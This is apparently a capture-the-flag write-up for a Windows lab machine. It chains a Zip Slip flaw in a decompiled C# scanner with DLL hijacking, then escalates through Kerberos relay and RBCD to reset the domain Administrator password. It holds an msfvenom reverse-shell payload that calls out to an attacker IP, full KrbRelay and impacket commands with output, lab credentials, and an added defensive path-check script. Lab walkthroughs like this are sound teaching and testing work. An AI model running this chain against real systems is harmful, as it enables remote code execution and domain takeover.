Unlike C or Rust, which compile straight to a native binary, C# is first compiled to IL, which tools can easily turn back into a readable form, so C# programs are easy to reverse. (It can also be compiled directly to native code.)

Payload : ilspycmd SampleScanner.dll

using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.Versioning;
using System.Text;

[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
[assembly: TargetFramework(".NETCoreApp,Version=v3.1", FrameworkDisplayName = "")]
[assembly: AssemblyCompany("SampleScanner")]
[assembly: AssemblyConfiguration("Release")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyInformationalVersion("1.0.0")]
[assembly: AssemblyProduct("SampleScanner")]
[assembly: AssemblyTitle("SampleScanner")]
[assembly: AssemblyVersion("1.0.0.0")]
namespace SampleScanner;

internal class Program
{
    // Yields every offset at which pattern occurs in source.
    public static IEnumerable<int> PatternAt(byte[] source, byte[] pattern)
    {
        for (int i = 0; i < source.Length; i++)
        {
            if (source.Skip(i).Take(pattern.Length).SequenceEqual(pattern))
            {
                yield return i;
            }
        }
    }

    private static void Main(string[] args)
    {
        // EICAR-style signature; the Replace result is discarded, so the
        // pattern actually searched for still contains "EYCAR".
        string text = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EYCAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
        text.Replace("EYCAR", "EICAR");
        byte[] bytes = Encoding.ASCII.GetBytes(text);
        string[] files = Directory.GetFiles("C:\\samples\\queue\\", "*", SearchOption.AllDirectories);
        foreach (string text2 in files)
        {
            if (text2.EndsWith(".zip"))
            {
                // Each entry is written to base + entry.FullName with no path validation.
                using ZipArchive zipArchive = ZipFile.OpenRead(text2);
                foreach (ZipArchiveEntry entry in zipArchive.Entries)
                {
                    string destinationFileName = Path.Combine("C:\\samples\\queue\\", entry.FullName);
                    entry.ExtractToFile(destinationFileName);
                }
                File.Delete(text2);
            }
            else if (PatternAt(File.ReadAllBytes(text2), bytes).Any())
            {
                File.Copy(text2, text2.Replace("queue", "malicious"), overwrite: true);
                File.Delete(text2);
            }
            else
            {
                File.Copy(text2, text2.Replace("queue", "benign"), overwrite: true);
                File.Delete(text2);
            }
        }
    }
}

Its main job is to extract archives, scan files for a signature, and move them into another folder depending on the result.

Notice the branch in the source above: for a .zip file, each entry is extracted to the absolute base path joined with the entry's full name, so a zip whose entry names contain a path can drop a file anywhere you choose.

Path.Combine("C:\\samples\\queue\\", entry.FullName)

ZipSlip

Zip Slip is an arbitrary-write technique: by naming an archive entry like a path, a file can be written into whatever folder the entry name points to. From the DLL analysis, the destination is

C:\\samples\\queue\\ + <file name>

so naming the file ..\app\guertena.txt writes it into \app.
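As an added example (not code from this write-up or from SampleScanner), the Python below reproduces the destination calculation the decompiled code performs and puts a hardened resolution next to it, which is the check the scanner is missing: canonicalise the joined path and refuse any entry that does not stay under the queue directory. The archive it inspects is constructed inline, with one entry shaped like the ..\app\... name above. QUEUE_DIR, build_sample_zip, vulnerable_destination, naive_write_location, resolve_safely and unsafe_entries are names chosen here, not from the original.

```python
"""Zip Slip check for the extraction step seen in SampleScanner.

Added example, not part of the original write-up or of SampleScanner.
ntpath is used so the Windows-style C:\\samples\\queue paths resolve the
same way on any host running this script.
"""
import io
import ntpath
import zipfile
from typing import List, Optional

QUEUE_DIR = r"C:\samples\queue"   # base directory the scanner extracts into


def build_sample_zip() -> bytes:
    """Constructed sample archive: two ordinary entries and one whose name
    climbs out of the queue directory, the shape the write-up describes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.txt", b"hello")
        zf.writestr("sub/nested.bin", b"x")
        zf.writestr("..\\app\\hostfxr.dll", b"MZ constructed placeholder")
    return buf.getvalue()


def vulnerable_destination(base_dir: str, entry_name: str) -> str:
    """Mirrors Path.Combine(base, entry.FullName): plain string joining,
    no canonicalisation, so '..' segments survive into the write path."""
    return ntpath.join(base_dir + "\\", entry_name)


def naive_write_location(base_dir: str, entry_name: str) -> str:
    """Where the naive destination actually lands once the OS resolves '..'."""
    return ntpath.normpath(vulnerable_destination(base_dir, entry_name))


def resolve_safely(base_dir: str, entry_name: str) -> Optional[str]:
    """Hardened resolution. Returns the canonical destination if it stays
    inside base_dir, or None when the entry must be rejected."""
    base = ntpath.normpath(base_dir)
    # Rooted or drive-qualified names would replace the base entirely.
    if entry_name.startswith(("/", "\\")) or ntpath.splitdrive(entry_name)[0]:
        return None
    candidate = ntpath.normpath(ntpath.join(base, entry_name))
    # normpath has collapsed '..' and unified separators, so a prefix
    # check against the base directory is now meaningful.
    if candidate != base and not candidate.startswith(base + "\\"):
        return None
    return candidate


def unsafe_entries(zip_bytes: bytes, base_dir: str = QUEUE_DIR) -> List[str]:
    """Names of archive entries that would be written outside base_dir."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if resolve_safely(base_dir, n) is None]


if __name__ == "__main__":
    sample = build_sample_zip()
    with zipfile.ZipFile(io.BytesIO(sample)) as zf:
        for name in zf.namelist():
            print(f"{name!r}: naive -> {naive_write_location(QUEUE_DIR, name)}, "
                  f"hardened -> {resolve_safely(QUEUE_DIR, name)}")
    print("rejected:", unsafe_entries(sample))
```

The prefix check only works after normalisation: comparing the un-normalised join against the base would pass the traversal entry, because the string still begins with the queue path. Rejecting the archive outright when unsafe_entries is non-empty is the simplest fix for a queue scanner like this one.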


DLL Hijacking

But why write to \app?

Because C# programs usually depend on functionality provided by system DLLs. The loader normally looks in the DLL's main install location, but if the needed DLL exists in the application's own directory it is loaded from there directly.

So first analyse what SampleScanner.exe needs, then do the hijack.

Copy the files to a Windows environment for testing.

Procmon

Use a filter to find the DLLs the program automatically looks for at runtime.
We certainly have no permission to touch C:\Program Files\dotnet\host\fxr\10.0.7\hostfxr.dll,
but I noticed it first looks for hostfxr.dll in its own folder.
That fixes the hijack target.


Putting the Attack Chain Together

  1. The account svc_scan:Sunshin1 can read and write the queue folder over SMB.
  2. When SampleScanner.exe runs it looks for hostfxr.dll in its own folder.
  3. Zip Slip lets us upload a payload that the program extracts and writes into app.
  4. When SampleScanner.exe runs it also executes our payload, giving us its privileges.

First build a payload:

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.44 lport=443 -f dll -o hostfxr.dll

Use Python to create a zip containing the path-injected DLL.

Drop the file in over SMB.
The bot in this process automatically extracts our meow.zip;
through the Zip Slip step of the chain it writes the malicious DLL into /app,
and when the application runs automatically it loads the DLL we planted and returns a reverse shell.

That gives us a shell.
user D0ne !


Root.txt

Privilege Escalation

Upload the payload.

Scanning AD with Certify turns up nothing useful.

Query the MAQ.

Machine Account Quota

To make it easier for IT staff to deploy computers, Microsoft by default allows any ordinary domain user to join up to 10 new computers to the domain, and that includes our service account svc_scan.

This counts as a small step of privilege escalation: the newly added account is an ordinary default domain account.

Checking here shows LDAP signing as None, meaning the server does not enforce verification of the communication source, which leaves it open to a relay attack.

So we can use the newly created domain computer account to coerce and relay a DCOM object that carries SYSTEM privileges.

Forwarding this highest-privilege authentication to the LDAP service lets us write our fake account into the server's RBCD allow list; once that takes effect, our fake account can legitimately impersonate Administrator.

Add my own account to the domain:

proxychains impacket-addcomputer bruno.vl/svc_scan:'Sunshine1' -dc-ip 10.129.238.9 -computer-name meow$ -computer-pass meow

Look up the SID of my domain account, because the LDAP allow-list modification only accepts SIDs:

proxychains rpcclient -U 'bruno.vl\svc_scan%Sunshine1' 10.129.238.9 -c 'lookupnames guertena$'

SID obtained:
guertena$ S-1-5-21-1536375944-4286418366-3447278137-5101

KrbRelay.exe -spn ldap/brunodc.bruno.vl
-clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
-rbcd S-1-5-21-1536375944-4286418366-3447278137-5101
-ssl -port 10246
-reset-password administrator Lacure77#

  1. -spn ldap/brunodc.bruno.vl (Service Principal Name)

    Principle: specifies the target service of the attack. The SPN tells Kerberos which service a ticket is being requested for.

    Effect: here, the captured Kerberos authentication is relayed to the ldap service on the domain controller brunodc.bruno.vl. LDAP is chosen because it allows object attributes in Active Directory to be modified directly (for example account permissions or passwords).

  2. -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

    Principle: specifies the COM/DCOM class identifier (CLSID) to coerce. Windows ships many DCOM services that run as NT AUTHORITY\SYSTEM.

    Effect: the tool invokes this particular CLSID (usually corresponding to some privileged local service), forcing that service to authenticate over the specified port to a listener controlled by the attacker. That is how the attacker obtains the local SYSTEM account's Kerberos authentication.

  3. -rbcd S-1-5-21-1536375944-4286418366-3447278137-5101

    Principle: configures Resource-Based Constrained Delegation (RBCD).

    Effect: once logged in to the DC's LDAP with the privileges of the local computer account, the tool modifies that computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute in AD. The SID is an account the attacker already controls (for example an ordinary domain user or a self-created computer account). After this is set, the account with that SID is allowed to impersonate any user (including a Domain Admin) to the victim machine, achieving full control of it.

  4. -ssl

    Principle: forces the connection over an SSL/TLS encrypted channel (i.e. LDAPS).

    Effect: by default, modern Active Directory requires LDAP signing, which makes an unencrypted relay fail (the attacker cannot forge the signature). However, if the traffic is wrapped in a TLS (LDAPS) tunnel, AD treats the communication as secure enough and the LDAP signing check is bypassed. This is the key parameter for making the LDAP relay succeed.

  5. -port 10246

    Principle: specifies the local port the tool listens on.

    Effect: together with -clsid, the tool sets up a malicious RPC/COM listener on port 10246 and waits for the coerced local SYSTEM service to connect and hand over its Kerberos ticket.

  6. -reset-password administrator Lacure77#

    Principle: defines the payload to execute after the relay to LDAP succeeds.

C:\Users\svc_scan\Desktop>KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-5101 -ssl -port 10246 -reset-password administrator Lacure77#
KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-5101 -ssl -port 10246 -reset-password administrator Lacure77#
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\svc_scan\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAADPx2clKZkDfxkl96+ILeBDAswAAOgW//92QzrEfN65+CIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 608206d506092a864886f71201020201006e8206c4308206c0a003020105a10302010ea20703050020000000a382050761820503308204ffa003020105a10a1b084252554e4f2e564ca2233021a003020102a11a30181b046c6461701b106272756e6f64632e6272756e6f2e766ca38204c5308204c1a003020112a103020108a28204b3048204af126c705a376898372f53ebb0824007488e1eeebfb4f8dcc64b210da436aff6ef2d8c619670a6ba1e266763dc0d52d3cc65dd01c4d3893c1705415b2f560a0e0418bdf5e86f45f02f9c365c2dbd86593264e373b753d6d6acfb75222d097e8b33f6c4dcb337ea5768a10f6e66a418ef385c031fef3e06e975854b82b0cae98e25335d50bca0890c2d9a86062a1c27bd2cc1bc742d288c0c5a2f14007d7673975fa99b3c38d41d852c286eee1dcfdb8d2397da9f3d128047854959b6e97e5529206c8ee37e0dbc274558c9251e43a918e38892c17ab69e930afcc73d967669ac67b266b837a9f0f34657ce2f48cc3f9a0492a6077b65055ed69655b46b623fb6aec12afada430e8f06a72a5775048d8c94807b723c36e8fdda731c0ab5067294fc68410d3f163ca365de97d51d8a31634ad8df77e40c4b8f918024f97f52d1a5a8fa319c44a3d5dacb6dfa53bf0c7d547569446e529236f08496d5be329dec89054e2d45263766f51cb85e24e06de56abb4361940fd9803bfd99219b35b4739f5de7721d2b637746c1c89e365309d5e928010bcaa3ab6af3988cea109f6517936238030895d72ca0e1b6c16c4f8f6f950d198860562d95d5c6664f6f0308317fd422952b41e42aae13f45fa056c8fa3396e64fd95d098ed0d79bcd8553005fdf06fd26929874b7afcbc0d8f036151a05a1a743d08aa5c279aacfac082181033545ecfe57b4bcf26ee9ec03a982744cfca8571d0fefa6e3290c4cfd2a7bf974b81d996ebc40d5a05c13b92517c55262cb03dff25915526b3c0bc9d535055d7b7e26d17c04059be2cb2e972b859bf25cf531c27535aba6b49656c7f4ceaa9c925db978c76da3c3615205fda19849ec23c27b666cf0096c57c9713b7b9301d3fe4e794817674661b2a9d45529b0df2b41fe4996c63a51e2be233560e5c7fb0a20bddf279a1bf442db2a3b059a65c4005f5f60d64fa57f113f0d58e9ee186464ba70793129dcfb6900e508cf3d931b7fc3aa3b7be39ff0a8c47908f718505ddf46d869e5afc66014d377288f14026180194188353fd8dea6e5ac40a6e3fd13f9cb379e36aa63ee5e674380a1cf0ffaad71b8202aa270e49560817171411b9692ab94f1397de93f84972875bc0cb6c5727849553d1d5a929cb3d1298e0b41f5f14560ccfa150962aa4f9c4e2c8ff5967ad21638f4c865b591ad907feee96
dc436e83777d1abcb843401e0a10f1657f865961023e3a06aeb5362c944de60ffb3171abccd6ba25c9825337689a4d0c31809b41993621abfe3f816c7eacee9a90ba9088f3edd1e0b5502f503bda7f3ff1b5401b87bf46facc9ec32626f8b62406123b8ff12b7f7eb73a34ace8e7d32eed9be27f21480454aa405def23789075898e28d69174f9948ae6a0c901714a0e1795b5343419e2e71e534c04f76c5d077371af2f50401b80369f0e8b99def59a4213f38c0311aaa2251d099b110cbec7e35a79e84f68498a595b0bb2b8596d6ad11d13a0d59ced657e47e93602dfd2ecd54f740e95ede3b3aee4c79a20f166aa71ee13aff59ad1faf2b131ca1f295d8f4f8619e389dac0c574a88a69a3873308a83878946f920fea3451784ea69cc0371d62f1c4ce639ce166b6572fdc18f15098f6c53e1f28e48834265b8904d5114914a3bb3b2aa65b063cfaeb1218e6e50748066d2e2a482019e3082019aa003020112a28201910482018d56efc4d9ce2cfa5bfe8e28d387b3ecfe44954eb4a0fe35ed2d3aa6000e16e09139783e6e0958ba2ebdfaaeaf2c0b4aa676e17f4587f59d6e506c3fefd18431b2178aef9dc887b6be50f46f9df3e9eb4ee477fff7ccd9c575b0d9cdff5e1a3e4b32524f9e2b7a93a154ff6fdbf379138d4bbd5901eea220af3bbbf1fd6742c431ed91610aeac9c6a25008b1d834d032337f66c781fe40b10a44694ae9ca5ff21634525a02b4c1da3f19afb247da45c8237345b6c2bf005adf1f1357ef5fbc7753bf84e9d9099fd881c29580f1c3e26410a7567d7c3769434b14b9f700725b0fd687ec02f388b90ad772c660dbe9d9ac7d7c70d601754a3e58b7f15c7e3f813a4ec1b6899d6c0d5b9541b1d8258d80ef369f485925288770007cc16e03aed1846e8f33cda7896b93c33c5167f531068123af651a226de13f651410e4793044d4a4ecedea2d7e2a97974e1a276a86b306d4921c634230f47cfe95b54ec28b5496474b55c22e4dd5262f36061d0dc48c5f1c63be0e540e7e8e01680876c1d3c358ac9dce1b0d2b105c80f3070e267a
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046e218ddf95e919d8989ed913b9910444e839b25c2ac7313b413fb53dea0abdbc8a06c478455252fc40a06ae65eddf6174f6e310dc30661854567f3c893aa5c346b880367180e19e4f0513e4df639ad320681bb665b2c43148f87d8f617988f777ae6bfb1597b13c1faa2ca0c8331e5
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a2440442d8b99db4f3a598a0f604fa182d9c8827348631dc1c5e6481cda1757863b5a739db575c10ccb79004d9c93e1d0ed217908384db1432bd0493743f426cb8007c485906
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS

got r00t !